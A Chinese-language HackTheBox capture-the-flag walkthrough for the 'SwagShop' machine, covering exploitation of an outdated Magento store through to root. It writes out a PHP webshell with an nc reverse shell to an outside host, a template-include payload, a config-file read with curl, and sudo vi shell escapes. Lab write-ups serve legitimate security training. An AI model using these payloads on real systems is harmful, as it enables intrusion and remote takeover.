SwagShop - HackTheBox

基本信息

• https://www.hackthebox.eu/home/machines/profile/188

• 10.10.10.140

端口扫描

22和80:

$ nmap -sC -sV 10.10.10.140
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-04 13:27 CST
Nmap scan report for 10.10.10.140
Host is up (0.072s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.17 seconds

80

是一个Magento：

Magento

Magento默认的RELEASE_NOTES.txt里只到1.7.02，页面也显示2014，很老的版本：

老版本很多漏洞，组合利用，sql注入添加管理员用户，然后认证后的RCE：

• Magento-Shoplift-SQLI/poc.py at master · joren485/Magento-Shoplift-SQLI
  https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py
• Magento 1.9.0.1 PHP Object Injection | Reiners’ Weblog
  https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi/
• Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution - PHP webapps Exploit
  https://www.exploit-db.com/exploits/37811

add admin

脚本通过sql注入添加管理员账号，然后登录：

rce

需要修改脚本里的用户名密码和安装日期，日期可以通过接口得到,因为历史问题脚本错误需要自己调：

curl -s 10.10.10.140/app/etc/local.xml | grep date
            <date><![CDATA[Wed, 08 May 2019 07:23:09 +0000]]></date>

webshell

另一种方式是直接上传webshell：

System -> Configuration -> Developer:

Catalog—Manage Categories

Newsletter—Newsletter Templates

{{block type='core/template' template='../../../../../../media/catalog/category/miao.php.png'}}

然后预览触发：

miao.php.png

<?php
passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.5 4445 >/tmp/f");
?>

• https://www.php.net/manual/zh/function.passthru.php

user flag

haris用户目录得到user.txt:

提权信息

可以无密码sudo vi编辑指定目录文件：

利用方式：

• https://gtfobins.github.io/gtfobins/vi/#sudo

提权 && root flag

可以vi运行shell，也可以直接路径穿越读root.txt:

sudo /usr/bin/vi /var/www/html/php.ini.sample -c ':!/bin/bash'
sudo /usr/bin/vi /var/www/html/../../../root/root.txt

参考资料

• Magento-Shoplift-SQLI/poc.py at master · joren485/Magento-Shoplift-SQLI
  https://github.com/joren485/Magento-Shoplift-SQLI/blob/master/poc.py
• Magento 1.9.0.1 PHP Object Injection | Reiners’ Weblog
  https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi/
• Magento CE < 1.9.0.1 - (Authenticated) Remote Code Execution - PHP webapps Exploit
  https://www.exploit-db.com/exploits/37811
• HTB{ Swagshop }
  https://epi052.gitlab.io/notes-to-self/blog/2019-09-12-hack-the-box-swagshop/
• Swagshop RCE — Hack The Box :: Forums
  https://forum.hackthebox.eu/discussion/2304/swagshop-rce
• HacktheBox ‘SwagShop’ writeup
  https://initinfosec.com/writeups/htb/2020/02/01/swagshop-htb-writeup/
• https://www.php.net/manual/zh/function.passthru.php
• https://gtfobins.github.io/gtfobins/vi/#sudo
• HTB: SwagShop | 0xdf hacks stuff
  https://0xdf.gitlab.io/2019/09/28/htb-swagshop.html
• https://www.hackthebox.eu/home/machines/writeup/188
• HackTheBox - Swagshop - YouTube
  https://www.youtube.com/watch?v=qECG2_8xw_s&feature=youtu.be&ab_channel=IppSec